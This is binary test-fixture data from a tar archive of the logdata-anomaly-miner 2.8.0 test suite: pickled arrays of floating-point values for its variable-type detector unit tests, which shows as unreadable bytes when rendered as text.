G?>G?uׇQJG?iiG?ŨľG?|p6G?%WG?S>#2G?AsG?e1G?$9G?wكG?`jiG?˻QVG? G?J藓G?NsG?CJWs,G?i e$gG?'qܭZG?G}oG?7^G?}HKQ G?l8G?G?ݞ}G?~#G?^6G?JPrKG?3.bG?øXG?ܣܶG?!G?."G?^?G?ُ)ċG?]&T G?А+DVG?ĺG?Y%`G?gHG? ~ 9G?l'kG?ӣ*G?r?3G?K&G?[G?E~(G?Q@G?H%G? wG?3ic'G?fCG?v$7%G?*(, G?BĸQ*G?*G?f'G?MN[G? [SG?! $RG? ~iG?B${/G?(=fG?fWG?á|G?R\xG?i^bG?m.ۦG?ѕ83G?%#ȰG?Ւ{G?0\G?PPG?ܾG?VIZG?TPG?™(JG?'lܺG?vgeG?@6HG?Gr2 G?e#%EG?bZ!xG?qWoG?wMfG?'R޻gG?Rj(G?d;OG?ظȈrG?O G?[z~G?|KZG?D!-vnG?i{G??1cG?i*G?ԝ lG?{wG?~'ƼG?Ѿ (G?ʧzG?tnwG?I6G? G?ђg8G?ázL G?]y zG?)V;G?bS@~G?ͱ[G?fEG?x4cG?PŨKG?ځG?MQRG?d(G?ȶ2oG?cr/vG?X[?&G?E9G?:hIG?GG?`- ?G?swG?(R G?2tfMIG?,tG?X\G?0G?X`ҟ*G?Q0s_G?0䊖2G?HgeG?܅G?y})G?Úʎ >G?ժG?ҳ\dG? F#lG?˔G?8r3G?֖>QG?A(G?wHmG?G?0$ӥG?٣fG?3% @G?TwG?=WG?G?ںɪ,G?(܏G?CJ }G?`c;ʟG?UG?Ԧ,G?i&G? G?#v]xG?}&\G?i T3 G?y7G?ξimG?ŢhrgG?+psG?QxqyZG?p\G?1܋CG?'+r=G?G?a2(6G?#×G?˯ExG?>3fG?|lSG?`&ZXG?V0`[G?rNG?JP''G?DxUG?+e sG?CyKG?`ZdMG?r$G?淺(JG?vːG?,nMG?pTG?eja $G?ˋ]YG?>J9G?sG?lgG?VIG?hvG?ݗWiG?"1 G?ZXӌG? JG?܎juG?G|@G?ޭG?z%G? 0K!G?˛RG?~`}G?ӀEAG?M{l,G?NG?'!G?/TmIG?>BcdG?G?ɚH(H?G?qy#c-G?, G?{=G?")iG?PG?G?/ODG?y9LG?`!ޑG?iG?K7 G?ޝu|G?կ`XwG?;= G?G?E}QG?-ã?G?oGG?CIG?iiHG? 'G?wAj֩G?؎v[G?yv G?ʀG?G?єYG?%Ÿ\'G?j酺G?ݾoG?8#JG?G?c +;G?>czG?cu,G?nxkG?u]%G?3G?LG?ڲk9¢G? sMG?ILCVUG?G?cSK! iG?`k SG?G-G?_G?[?h= G?vBݴ%G?G?}n)G?[G?XgXG?!VX2G?Z, G?D<@G?9G?op?*G?I IG? .`G?/UG?X[G?0 G?WG?XJG?n?WG?۾bhWG?w G?9bn.G?EʧG?̿3G? {VG?ǎ;dG?ީ#DiG?uG?αI-G?ȟ=G?iMG?ȗ 쪽G?",G?Z>,G?T]r'G? $&(IG?'$NG? G?RFG?АG?uƚG?טTY\G?LG?fW LG?W}_G?ĥl"|G?]ONG?߁ 5G?,{$=G?^AG?V,G?۷G?=<,bG?uitG?RĊG?j!iG?#g(G?k2G?mP|]G?nϢG?p[&G?sɴ(G?ʏ3G?G?YtUF:G?aG?˚;Β~G?q[PG?۪"G?nUG?=srYG?y!.G?|TG?`̴MjG?ofG?)wJG?lG?:G?C56 G?~ƈG?$AG?6BG?RVJG?ݧB}G?{iG?tvG?uYJMG?։ƒ|G?_0bG?3_) G?lw2G?rdG?&DG?RZJ6G?v@oG?o|mG?OC`G?]-G?+G?"NsyG?ed,G?Z(+G?էKYG?¯6G?ZP˜G?0G?""0G?˱sFddG?NBDuG?eRq=NG?-&b?G?RMlG?4RG?증 G?=G?]MM?aG?G?"aG?c< ,G? Q%G?į5{nG?G?'K/OG?ruG?_G?ӐG?UZ6*G? 1G?! 6G?CVG?DG?'G?]q FwG?ͱpG? . G?ЙgvN~G?tFG?'>-G?UaG?LxG?;G?iyG?#3 G?#dG?sRAUG?̸ֳiG?D$qaG?>(G?r?GG?)`/G? 3G?Ưi]ԽG?ЂG?ȱG?w*G?ml8G?ا-ӰG?u"BG? rLG?9X>G?asG?&!G?g\ G? TG?ٳrG?cҊsG?ZP PG?r~zRG?UeG?ΪG?PJ6G?vG?G?p㛒G?h3SR}G?ϞvnoG?G?ye1}3G?^EG?c:a@G?'o|LG?F(,G?l+օG?؍G&G?K8G?W7<4G?u^m G?{[+@G?=$G? ZG?ΡעG?kH1G?oFCG?;T jG?wDeG?$mMG?Nf8BG?rG? !>G?R(aG?u}fG?fG?oQo +G?eG?εۻG?_tSG?9BqG?*m{G?5HG?,klG?χMfG?r,TIG?&w|G?t7?oG?o[G?GLUG?ҡ 6G?\`G?̜!]G?ط<G?+MG?fPG?eG?t_QG?N(rG?D.G?#[BG?pqG?glG?9uEG?qYyG?B0wG?2G?ЁZXOWG?hUPcG?qxZG?y-G?7^,G?ʵtG?ƌPBG?pG?ү\uG?IӯG?ˎpG?h`WG?q1G?R!qG?Ȓ}InG?K6 \G?%lFG?<ܿG?]jG?D*G?4G?]1iG?g`G?ƑelG?gf@zG?(XyG?dG?ŵי9G?tfG?ҁ܁G?۳E(G?K4G?ÈG? &+ѻG? ?8Q_G?vG?{ꂐ!G?W xG?b!KG?e{oG?*ڟmG?Iv_ G?qOHG?)Θ޴G?@G?mxG?Ԗ$U\G?5G?oI G?<G?DʽG?{ G?ʂy G?TTMG?UG?{[VݰBG?є2E^G?pa1G?BZ~IeG?5 G?h_ZG?ƷgG?>a_G?~LLcz9G?{G?epG? .GG?XlG?z-KG?hTG?h?G?aڅG?VyUG?Ys0G?v,G? &7G?ɃG?UmVyG?hB G?CMG?;rG?W"36SG?!]+,fG?e"MbG?3TaG?$e](G?Na#G?&G?y'l#G?#=xG?ǩ G?EG?+G?"}s~G? ScG?xG?͂FEG?O&G?lmc!G?HG?j̯G?=!N0G?L&cG?\ͧrG?ѶG?y$hG?Ș)G?P$G?,HB'G?7HG?ưj5G?hG?}cG?KcrG?ҖnG?G=G? 87bUG?&2.9G?yEG?cG?|G?+\T[ G?lG>TG?MG?۪\1G?i-G?G?恿<G?yG?0*G?ϊG?sG?h_HT,~G?gȯAHG?߰GG?s3G?G?!&G?Ƹ4G?7SG?`I7G? "LyG?~{fRG?àtEG?j_5G?i_gZG?I:ox/G?^G?|؆G? XG?ֺStqG?)Wt G?gp6MG?we#G?GtJG?[CSxG?yjG?=ַ}G?yO$G?tG?D0LG?М#G0G?C|G?ߛ-yG?߷kG?\*AG?$КG?gyeUG?G?k5G?KbG?ءKLG? 1G?[ZG?B$G?ؼ" G?ܣz]G?2 G?͊a1G?fgG?:^ĊG? NG?Ɏ静#G?$G?}TPG?E.G?pN#G?,JwG?SڕG?A&:?G?\bG?v@90G?ȗG?z/G?vGrG?:QG?AG?:U`G?Ǥ> *G?֘tp2G?G?ѮxJG?7a3 (G?uEG?A G?àG?V7G?x$.G?/7 G?*kRG?,SMG?"lG?l?FG?|Z%G?ԥ7G?ä)G?wjZG?,*G?/<+ G?t{hG?Y8~G?ưΪgPG?=|gٕG?cqG?Mt G?u"G?L$G?=g7G?&_ G?әy6=G?ƃ^ɨKG?ehrhG?FL5G?WG?DbyG?1=G?8P<3G?X;Q3G?p7G?:(G?؞^G?[qG?[ltG?"0sG?78G?RG?G?/G?(1G?.=aG?"'G?z}^G?WEG?lJOG?Ѷ+NG?K dG?wTNG?L$G?ItBG?]mB7]G? kG?pR]G?qkbG?q\G?bkG?lj#G?bŭjG?wG?G?Ѥ=.G?{[G?qG?J]nG?uS[G?{:G?*G?E4s5G?A 7G?D|G?Ȱ2L1G?WzFG?¡ G?wG?걕TG?ÔK+ZG?=|4G?ڢ:bpG?~(G?g}G?ӣG?|4G?ٗhG?;"G?ܭÍG?ʔV8 G?5I1G?&35G?)G?U*7G?SPG?E>G?ɸ)qG?rU{G?}'G?AwG?^`UAG?ꖈPG?%[G?ͬG?"G?ク0G?bEG?N9G?{ Ђ(G?#%aG?xF̮G?ܸYvT #G?l G?O#>{G?RFXG?ۻ.G?$MG?݃Y?!G?؟nƼG?LvG?v/eG?Hx\XG? [W]G?ؖ FG?ʌveG?Y+G?y:\3LG?+ʤ.G?G?.I׼"G?ظFG?T,/G?#;G?Y(G?ҖiC# G?e,DG?SG?ᬳuG?E<[G?>P G?ǿ !RG?v3G?}fG?NA?FG?4jG?AG?ܣ^67eGG?;IG?}y|G?iO&G?7PG?G?ņ$cRG?ՁpG?N1É4G?Ýٔ~G?oERG?vnG? NlJG?§GG?"I 0G?8G?B+G?Lʇ[G?@4G?JiG?iBG?@l-G?ZqG? /(G?pPjG?.*˽G?ȎKG?xb!8G?n+G?߻5G?Λ G?=}G?8_VG?5VhhG?ou G?,)G?r, )G?WUG?e1Q5G?ѴOoFPG?{jܪG?mH jG?ו5G?ҿHKcG?21aG?e@G?H*G?*G?LGG?Jq(0G?#ڹ G?ߗG?lj.G?6!G?ҘD2QG?`xG?QVVG?f9pG?v9l_FG?*G?M] YG?٭/ G?(:)G?ЭG?G9ǍG?Akm7G?i\ G?36@G?%wMG?DZG?ЛhG?QMv[9G?D1͖CG?R"G?^Wv!iG?効jG?sE(G?hFWG?"J)^G?d?G?)g)G?I-G?cYG?+WG?ș*HG?|G?-n4G?ODG?uw_G?y^pG?Ici&G?-ǔG? CSCG?n?i]G? BxG?;'7kUG?6QG?bG?YdiG?SJ;G?c7sG?>,,G?1Sй)G?v kRG?ϖ4>G?K[G?!`޲G?lG?0RG?qIG?6G?)9NG?1}4lG?!^IG?2އyG?)rG?G?/G?%ФG?y=VG?RvcG?!WVzG??G?ǜCG?N[`G?{G?G??ٸ|G?F)OG?Nk G?QG?LT.HG? j G?nT2G?,߽G?KCG?ѽ2{G?  G?L|pG?|կG?ȞfG?\2"G?G?~G?6JZ{G?$G?V8FG?$G?E@]G?G?kRi"G?Pc(G?kG?n%- G?El6-G?ٙ}4G?Ȳ7GoG?˄:|]G?n5SG?8.G?F`ӊ?FG?7G?}J2HaG?XIG?J QPG?xCG?V(‘G?I.G?ĵ1_[G?|G?Ĕ>G?*XJIG?G?,%]7G? ~KG?bYBYBG?,^DJG?rYG?'^EG? X+"G?# G?zusG?^nG?z /#G?ٔ3lJG?cQYTG?RW~AG?]GG?-G?c}G?1!$G? ( FG?G֣G?2VG?CW}G?CG?Y:,G?C,JG?RK G?1jG?8/=G?u\gG?hPXG?*naG?RG?o%s"G?"*G?WM[QG?\߬G?ߠ;G?̍PG? IG?w0G?,iI%G?lp FG?ЋG?Ǿ7G?kG?PG?""kG?ᆓ*&$G?Є;G?dA)G?' +?G?|G?[SҶG?]-pG?϶djG?riYG?^G?bO;O[G?m1@G?Z8ԯnrG?2}P.G?쓅G?+ G?7 FG?-!G?2[G?.a(G?ǖ8TmG?^JG?Mx'G?AȀG?%fG?Oc+G?ʊ|$G? 8?!G?ع}G?5o=G?npQG? m G?kSG?i4G?5@lG?į(G?6,~G?fSG?oyxG?}|]G?zdiG?X%cBG?R;G?8QG?^PG?yл G? U*G?}v&G?$G?CusG?X5G?I%8G?EYG?̳#6G?rG{IG? iG?kPN_:G?ҡ;e](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta5_data_test3000066400000000000000000000432761500476301700275310ustar00rootroot00000000000000F](](G?mP6LTG?pG?)72M]G?@9G?똉|݂G?Y G?歾G? $e|G?\EjG?܌-G?,W@RG?yBAG?_( D8G?W/vG?>PG?($G? Ta_G?#F"G?1gG?D!G?a}-G?̤G?אgG?M\G?>G? :EG?G?HXMG?B(tG?\" G?M׏G?wG?4G?rJG?HlG?yٚG?癀}h G?/9tG?ZzG?郮9;G? 9G?Elj?G?T|B;G?) jG?4<ǠG?ba1G?̒G?\֋$kG?`7AG?#g݈G?̺O G? 2G?^moMG?زM/;G?FEvG?"E G?G^.G?AG?Ԛd9G?G?]ޑ\:G?+%53G? G?@x3G?߶G?쫢mG? G?pwlG?Y˕G?E&+G?-`2G?T:4/G?IXG?Q9>G?6G?¨̉G? 4wG?DqEG?_G?xLG?v0G?G? *XG?P7~G?*AG?&ϙbG?뺺&-s5G?~9G?iaG? G?pRG?OSa~G?2JG?:/-G?~[G?AfG?d#G?k'G?]ڄrG?曐G?_G?nL5 G?MW$G?A ܆,G?MDOG? mG?r} G?ao"G?#/G?݇[ӥ\G?G?񅯘G?4G?8G?#X}G?JTsG?CFJG8G?2 ,CG?jfȜG?NG?F hG?l.G? KrG?)$G?ΰh G?2W[YG? } }G?{라G?PqYG?BSG?@JWG?TTG?ۡ4vG?ؔLmG?吒WG?hRiMG?EVNG?j)EG?DVsjDG?[SdqG? G?[G?'G?9KG?ʲ]!G?4B)G?Qc +G?wq(G?멱wTG?AG7G?7eG?o sG?G?'G?-PAG?,}U3G?إm(aG?KG?B%(G?èDG?T:G?s1;G?\%-UG?#% G?`G?(aVwG?8Y?G?e.G?NG?, G?JkG?(cyG?n$G?$s]G?춉ķqG? OG?f+>,G?&AEG? Hj-G?>嗤UG?+,G?!KG?,cA"G?[PG?^2'G?*G?3WG?2 eG?%G?sTG?}GVTG?~EG?[q4G?/LG?ǩ@/G?pG?3G? =G?~@G?KG?HtG?W@-fG?lӿG?5YD+G?7G?+OG?jR'G?!>G?=qEG?盜 яG?xiG?|xtG?qdG?{ۙ3G?1quG?12`G?iG?+!"ߢG?|G?!1G?kG?˩G?BG?)UG?4WG??G?wn"G? AaqG??)G?YLnG?p?G?uSG?M'< G?צ$#G? NG?߇GG?G?~hsG?h;4JG?đ;hG? m>G?MgLG?3ӤG?CG?#TG? "]G?rMG?~U G?]G?۟=*G?JNJmG?\3G?(7FG?/do"G?thdG?+ {G?~G?e.sG?7C"%G?tG?u:;G?y͑BG?@;eG? D`G?}pG?/vG?䊾 G?ѥG?ՍiZ@G?AߤG?;3(MzG?%G?߈x {LG?v&^G?j G?]&G?й&0G?ֲyG?nvG? `G?iV}G?+Ѷ?G?V1G?2G?6첹O3G?aHSG?B%G?~tHBG?\QrG?vTG? 0G^G?久 -a%G?亖 ?G?͢; iG? Q?G?y(/vG?eIaG?0wG?0G?/4HG?^GG?I G? AˌG?tޮG?"OG?Z^G?넳kG?KwG?గb%G?%EMG?F_G?ed!rG? G?Z[G?.Y؍ G?XOG?写fp G?뒀@W/G?X1G?]~G?W]NKG? G?A.ݺl#G?G?G?$1n(/G?2G8UG?* 8G?by+G?8#R8G?{N^G?ѣ\̢:G?5B|~G?v[iG?ZUG?aRG?٤gG?#_G?ﰘدG? PҵG?u.3G?]# 6G?VRG?EiPG?E"G?OcM_G?ߑǢG?: ]G?hG?qq;;G?|ӚG? vG?n FG?{zG?\G?h{G?G?P\:G?>G?첻G?1G?)!:G?j,f_(G?pG?ѵG?~ŷG? G?WG?IG?! :G?#5G?+u8G?bG?Gi&G?~HHG?4ހG?冭'jG?:G?,r-ԀG?BFlpG?.̯?G?jG?챋4'G?ꄲQG? 1G?xƪ;G? w0NG? Bc~=G?rLG?*N%G? g|G?hLbG?&)G?vWݯG?_vQG?>̥G?P=G? *G?Jt34G?0qG?eyG?RVG?uhxG?oG?jV3G? ݊NlG?lG?Z.ZG?0ϥ'G?c=JG?+&G?jRG?侰Q_G?$bkG?.b}j%G?sQՖ/G? I@G?@G?ZWG?Px.qG?썿>ߡ5G?4Ne(G?8$G?uDF,G?mOM|G?L G?kFG?U3G?ndG?곓G?/'UWG?噴?aG?뒃ȫ]G?VG?%蜭G?zNf$G?Q#aG?*G?LžG?PG?БG?qtG?3"޸ G?ۈ]G?>V"mG?UG[G?=s-G?^^%G? ;&G?셿,G?)se8G?H_G? ,CG?.cG?)G?ٙ@G?ѣ^G?GjG?@$ЖG?PG?IG?HZ?G?4G?V3#G?]G?`VG?dB5G?˅ G?wټ[G?v$G?@9G?^\G?)S>G?y*G?X&G?7IG?T~ȄG?! /G?$G?SlG?,D7m兖G?YvG?4G?頇!APG?~G?/G?~ |}G?dzdsG?CG?M"גeG?G?ө ]!G?jIǦG?G?0uG?ml G?I)G?7n*G?pWmG?2IG?`HD-G?D7~G?YM+CG?|Й G?DRG?9 PG?\}$G?TG?"/'ύ`G?N攻G?Dw:2G?/iG?HWG?LC<+G?caG?J7$G?2dYG?!G?.R|աG?ň1LG? ba/G?:G?l"JPG?馱\G?g0ezG?qTG?'r1G?KűZyG?t|;G?:@G? %j2G?L$G?̠TG?K\P]G?\.tG?>ߨOG?G?^>XG?CuG?QS{~G?1%OiG?5G?g9G?_zzG?P_G?ɚG?tG?ac@G?|ꞙG?8mG?pLG?jG?na{MG?a@1G?EG?cAG?8!G?(G?xG??G?9TpG?UmiG?pSG?/;G?TrG?+hG?9BёG?a4G?eG?k嘖G?sG? x$iG?vG?$P8,G? CG?mG3G?}[G?s~G?6G?uyG?שSG?I iSG?A>$G?rMo3G?.G?; =zG?{!G?i15G?XI%G?J<$G?X1tdG?뾡IG?ycUG?tNG?LUG?~7SLG?JyqG?G?SG?~|G?A2b1G?)\ G?R5QG?3-"G?;Yގ,G?%OvuG?}vŧG?"OuG?]߁G?ҪG?{G?P_G?4nKG?< G?NdVG?xhe"G?0cG?布ŠMG?zVRG?biHG? F9LG?˶RG?aYG? \G?kG?^+*G?주ZtG?}zG?ܱG?<爉G?&G?0QLՖG?ïyG?[dG?s ZEG?G: G?n,gG? wKjG?%"G?:G?n:cG?[ G?BG?*GcRG?a +EG?R/TQG?;WG?UvMO#G?!: G?#fG?oG?!*G?yjG?BӫG?4ZG?nWLG?lR}uG?TnG?eKG?m3G?麶G?Nl3G?b4G?正h1G?BvDFG?ܫ SHG?h1,G?[@G?13G?VxA/G? 8G?įy6G?"곑uUG?G?.G?=qG?8G?T:G?̎(FG?}HG?n|pG?;lRxRG?|%G?Α@G?zwvG?EaG? IG?;`iG? Cg%G?JPG?$0O/G?r3jG?cgG?U|?G?ʒG?ōeG?/ȉsۊG?8CG?o3OvG?ʍ@ǛG?"5G?RD%G?}G?ûJr7/G?R{覗G?ﻄݧG?uXG?sg(G?g[\G?6G?iDG?aGpG?y%hG?F]G?i*G?~ѼDG?璒cG?몌 G?>$k-G?yHFG?~uG? G?޻6G?QNG?Tc{G?91G?1|MG?-gG?f/G?p F%G?@uG?EOVG?*o1G?碍B G?CG?G?큣G?*onG?%G?ȻdxGG?Pv-G?=G?gؓ0cG?fvgG?φG?fAPJG? G? z G?(jG?ieXG?rv-G?QKG? G?? G?Ư|LG?﴿G?@d1G?=^4zG?$a G?n`G?2J٠rG?ۏG?ѼeG?uG?-G?G?/#G?(żZG?+68G?ӥG?͞*G?^G? mGPbG?N3'G?y(\0G?<>cG?À@G?qkG?h]G?夂#,G?\]=yG?t/2G?EzG?.0FG?ȴG?3}2)G?X7) G?S)G?G?osiG?^G?K-͓G?W"G?嶭Q&G?=ԋG?D?7:G?)ݗG?s)&G?jyG?6NG?-cG?!Sg]0G?MXG?ztG?Y)G?}G?؃ G?g1b=;G?sZaG?"RG?٣1G?G?U(G?, IG?p%oG?DhP1G?쾱G?O1P*G?Nr>@CG?L[;{G?LG? SG?UXCG?r3G?xAG?Y[HG?#G?-jDžG?eA!G?kaG?oG?G?#G*G?p-G?FG?ϛvDG?G?jc.G?/zG?G?gh[G?`>{G?`{JG? .e#G?XrG?7G?}=iG?XAjG?JG?YG7*:G?٣G?鵗 G?UrJG?흸G?RYDG?[5Ґ`0G?(G?U֛rG?V=KG?^„"G? xG?퇓`[G?ǟJG?/4pG?J| G? G?L-G?뾄.JG?~^G?ǖ>G?K,-]G?꤀ɛ2G?xY.G?ƩG?tzG?fG?ԨG?G?GO<G? f>qG?tmZ `G?YyFEG?5%G? ϼG?VZ'" G?ﴦbG?KSh|G?0I3ҫG?CG?>~m:G?u-G?yVl9G?6xG?kG?P g-G?*G?}oG?Ȱ^G?r]"4G?ȦYG?ʣ2aG?zHG?pqG?/}G?t1OG?T/`G?;ئG?ֽW'YG?gEG?]e@2G?d}QG?:XG?G6<G?zз6G?'OtG?陽);G?݄ՔG?Q G(>G?; G?yG?zRG? J^G?竓MAG?ĕ G?2G?hG?}ޕxG?A-}G?p+PUG?37kG?Sc?G?^x_[G?3FG?dmG?CRG?ieIG?]DG?N}G?aӗ`G?w-G?d]G?EdvG?qyGG?e*bG?ʝdG?FG?t)bG?0>cG?!G?HqG?&O+׀G? G? 4G?4r>G?Tg]WG?怪AG?gmSG?ʲ:G?qľG?‰ G?do G?F~G?@iG?>95G?E- G?)"G?m*G?eŜG?$uvHG?/jG?p$G?T OwoG?UٍG?u:G?|yD G?!>L G?9Z,G?0o G?=3 HG?.KG?m"G?G?WG?G`SRG?ȫG?,$XJG?1ꤻG?G?-eG?]G?:ռG?纕$(HG?)r G?ꈭXڍG?[{NΩlG?G?PZG? oo#G?IG?ˠHsXG?!,G?k skG?#;RG?뱅)3G?篋3G?إx G?@*G? -&G?KzZAG?.7P@G?556G?&(G?ۜ:G?:K3G?8opkG?CG?-ҼG?|YG?UۧuG?ӬiG? ݁9G?[PCG?g0+G?8QG?唘> G?^ڋG?ᯙG?0GMG?[*lG?aG?cG??G?o`G?χG?5!RG?B40G?L8[ߚG?YmG?=mG?Gm4sG?ݮQUG?ZG?Tm[ŜG?7|G?cO8lG?ZAG?MG?FG?6G?l0G?Om|G?gNG?pP}G?\ U G?eIuNKG?% G?럌B5;G?}G?DNL4G?縫ޓG?eEAG?҈J:G?X=G?egvCG?%*1G?-"HqG?IT]JG?^;G?A)pG?yaG?51G??"=G?ɫG?栨_C~G?3 G?)bG? D-G?Ꙍ?=G? }.G?At G?iV2jG?K&'G?R*UG?hʒG?^T=VG?渠1=vG?UOJ6G? BG?N+5G?e:^G?yG?G?yG?/dG?7NG?՚^G?'G6G?;=Q:G?o٥G?莖;DG?"b1G?1[G? {>G?XRG? FQWAG?ĹoLG?닪 G?,>G? @G?uðG?IaG?9nG?zӿiG?N2ڔG? b\G?ܩ G?[ T-G?W&̝KG?" G?we-bG?LϲG?xlG?JYFG?&&\G?qi/G?݉9F1K~G?F3ZGG?0,{9[G? '^\G?N&5N~$G?C5G?F\G?IG?B[`~G?~@G?^I-G? G?6!q@G?.TG?U]G?zG?$G?σG?1hG??!G?~G~wG?2zQG?!EG?gNG?GuƟG?崩;G?8*6OG?U DG?L~%tG?GP]G?/(cG?p*8G?aǗØG?yK_G?56cUeG?LG?7@ZG?LA$G?, G?عKuLG?8LKG?(ärG?IG?G?һ5G?gG?2>BG?鶨LG?{:2G?NB4e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta5_data_test7000066400000000000000000000647021500476301700275320ustar00rootroot00000000000000i](](G?-_G?GMsBG?Z} G?R1G?NG?uGDG?GϚG?G?H9G?g^(5kG?V;LG?ݣ%G?~zdG?$^LG?(G?z&1ӂG?YGG?MG?Ǩz)G?'uG?PpG?A)lG?JMɩfqG?pCG?锢@;G?C\G?(WNgMG?^K<9G?=G?@ G?FG?{G?BsG?W֢G?ާj4n^G?H)G?Ye=G?Si G?ò8ZG?ɧG?7E6G?)}G?Sx( G?, JfG?hAG? .l>G?MvG?뤅KG?좡G?Z-kG?=5G?DzlG?t^G?QƻG?NE*G?0'# "G?T2G?gZG?R_BG?hG?诲e6 G? G?:ZGG?\%cG?zǓ_G?,i{G?4\ZG?E "SeG?MZTG?jCG?2AQHG?툎YG?&kV1?G?WG?e}G?E0vG?O@"G?7wRIճG?Ct"G?E %]CG?eYx7G? b_~G?7 TG?bvX.G? V8+G?A G?eSG?N,G?d9;G?(G?Z7G?츰NG?8 LVG?[1NG? TG?HQ&G?nG? :4G?_VG?뺈AG?aXG?RBnG?* }&G?f TG?G?WgG?zG?Wr՞G?!G?OԣG?;G?pG?xx)G?`?ve,wG?࣐e:'G?êHkG?1IG? BVG?{[@G?73 G?h|MXG?_ G?݂-G?{Q*G?cv7G?4]uG?^?xpG?f_G?qG?̶hG?ȉ5vpG?ZG?FуVG?՟G?9lsKG?s`"@zG?dЇrG?ޒJX%G?[(3G?)i G?k\G? cG?P{nIG?OSG?t}LG?=GG?Hzv_G??>G?({G?٢fG?06l G?8U-G?G?L%G?hl&G?bHG?4`6G?뒆."G?̶uU{G?W^G?yN~G?FcG?G G?na;GG?:dG?G?G?dLs>G?ՒG?2MݲG?YB G?#ҨG?ǸqG?@G?G?Rg|fG?GG?RegG?t%G?]tG?*tG?wKG?(;G?O!G?KgG?h&uG?tG?]/G?'!aG?Pm`G?EfتzG? G?њSG?0hNoG?. 6G?KG?N3YG?VOG?F+G??(ʹ{G?C2+YG?L G?Q>SG? lQGG?J^ -G? CG?G?ꬬFG? G?(_]<.G?3m@G?dAG?ĶO.G?[!G?V_XxG?9(9G?ȬwG?61BvG?upeG?/8G?,BnWG?qG?ЗG?s,AG?_nu* G?daG?w?G? G?08:}2G?oG?ᾼAG?4KL+G?eꢭG?ݓwtrG? @G?p<G? =9MG?ϏW(G?tHuG?禆ZmG?O/G?sG?۾jG?')G?够@?G?x@seG? ZG?G?G?G?? G?7PlG?\DG?HOrG?3q">G?-\G? * G?CG?8lG?c$JG?7;'G?) G?1TG?!ZLG?Cjw9G?5Jm`|G?E̕G?þpG?;rhG?"G?o_j5G?<3G?kdG?<VG?um4G?VG?=aG?QUzs]G?ZwXG?5+sLoG?5зG?тɏCG?3;'G?TEZ~.uG?%v!G?i\G?UG?uoG?oo4G?;CG?%eG?췦U9dG?ˀ'`G? loUG?;P"7G?z\G?B<G?x/ZG?i>G?Z*;G?9"G?60K%G?G?i$P8G?c:G? =LG?ȁG?]=hG?(i%G?aG?IR G?G?dq;G?) i~zG?0}G?^G?]Sb]G?Jc_G?DkqQG?uSdG?IG?C/G?6#77dG?WHi}G?h'G?U9G?ﻃXG?C_6G?X5G?FhQG?+nG? [[G?E. G?hl!)G?{5G?ݻG?G?9-G? dG?]O`G?CqG??PG?nG?P^G?4\G?ӷG?,~G?:IZG?NZG?TB6G?BΏiG?K7G?٣q1G?P馎)G?$tG?O91|G? :'G?[.G?y9LMkG?nAG?idG?yHd/G?LW-=G?4%SaG?G?OM2G?]G?1\G?%G?p=JG?' ge{G?摁G?-=G?OG?t.G?I;G?q-pG?৔9:G?椩vG?WG?G?_TG?xxG?G?t! G?lG?tMG?p?>vG?wG?F#bG?{(JG?JiG?H\urGG?9G?HGG?( G? }G?mxOnG?:ƻG?  6G?G@=f}G?J<7G?|y+G?CYG?y۷G?SPՒG?MqG? OG?z?ҔG?SfG?G?첦@G?i`+G?yjG? G?#r+G?4cG?enRG?0^i8G?pg>IQG?ttG?4sG?GG? iG?(FBiG?ݷEvG?cG?7 HG?rG?Q\{mG?<;ZG?;DAIG?ܴaG?$;'G?A`dLG?G?QG?%[&G?{bgG?n|ZG?I* G?Ԑ&?G?$ߕޑG?$R}5UG?}G?=hG?Yɤ]G?n:G?Y G? Vvzc}G?v(kg3G?'/OG?xG?喧AsG?x4G?beMF3G?h$G?QG?ze@G?@ɇ\=G?8BG?c^9G?bvG?YψG?qG?,@zG?flEcG?#)N0[G?CGNG?pzG?wgG?00~CG?pGVG?@>tG?> :jG?墁) NG?UG?'EG?2G?悔jG?G??$AG? IC G?m?G?FqG?ݟ*G?lqG?:RG?{YWG?I~G?o Uz G?CG?G?FJkG?VݪG?NG?I1eG?QuzG?`RG?EG?*G?UaG?JS|>G?Hz]6G? G?(G?oi`{G?GyG?iG?ϨUFG?!JI}lG?P~G?lS)pG?m G?'_cG?S3GHG?FA[G?X'G?vdG?G?cNG?Hw͊HG?"KW"G?dG?=mtlG?O\CqG?<~voG?*ۛG?!KG?6,G?OΔG?QG?zC*G?{(G?.k/G?A}G?AaG? x7WG?wG?g0nG?uCTG?_G?K43G?w~cG?؋NG? G?V'6G?x*yG?ꞏG? lG?6c*G?f˒G?'ƘG?g|G? G?禤mG?@rlG?дG?EG?)AG?7QTG?$vG?sG? #Ҽ[G?h)McG?줲B4G?\F^G?DG?4G?e1 -G?kUG?hG?5G?|,G?nɑ G?Ѹ{>G?aG?wlG?Ff1G?㚫rG?(G?V•q G?!A{L!G?G? 5 G?ReG?BnG?hMG?ԥiC:G?ᄆ~YG?ʀG?텽6G?%gmG?`'G?IlfmG?Hi՗G? G?)G?P}:G?= lG? vEc'G?CIG? u|G?P m~wG?DžG?쓗UG?P:@G?>3zvG?։DG?_X G?TmpG?JI,G?JuG?drs/G?G?V]G?~BUiG?kw;G?hRR)G?sрG?VNG?켛CUGG?LxjG?זּu/G?絙d"/G?FlG?:.G? ZJdG?A:@G?KrG?ޏ;G?!ǷLG?+foG?tYcG?|Z.G?x%GG?U?=G?nQG?di G? G?cG?juG?1G?}G?CXG?裱G? nG?T/G?:æG?*e&G?LdG?惪k G?> |G?"nqG??2=G?` G?"G?xvG?K.G? G?z | G?G?TNG?,@MG?n>,G?BoG?_ځG? y[G?=zgJG?G?hyWG?,{h8G?]B"G? nG?=pG?!xW7G?fhG?sfeG?Jˋ~G?‚G?цG?6iG?vMG?ܬu-G?jUG?^03ƅG?kE]&G?HaG?fEoG? [`G?Fl1CG?Q3oZG?﫦BG?RqRKG?NjP>BoG?H.KG?.~oG?kR`G?Y̝G?JFHG?>=AG?}jG?;\AG?՟]G?/KH,G?YWG?EG8G?^VwG?G?*羽G?<tG?3>ohG?C1G? 9t6G?}0Y[G?]t/G?׺aG?iG?RncG?[uG?Z WG?-_$G?ʄG?oG?oU PG?IJG?PFXVG?SG?͔r)G?@G?~;G?%,4}G?;^OG?pG?'VG?N d?G?GW\C2G?\(G?5=.G?Ds=dG?G?ז:G?w{G?t}G?p xG?S rG?'h>EG?=G /G?E QUG?qBqG?Y 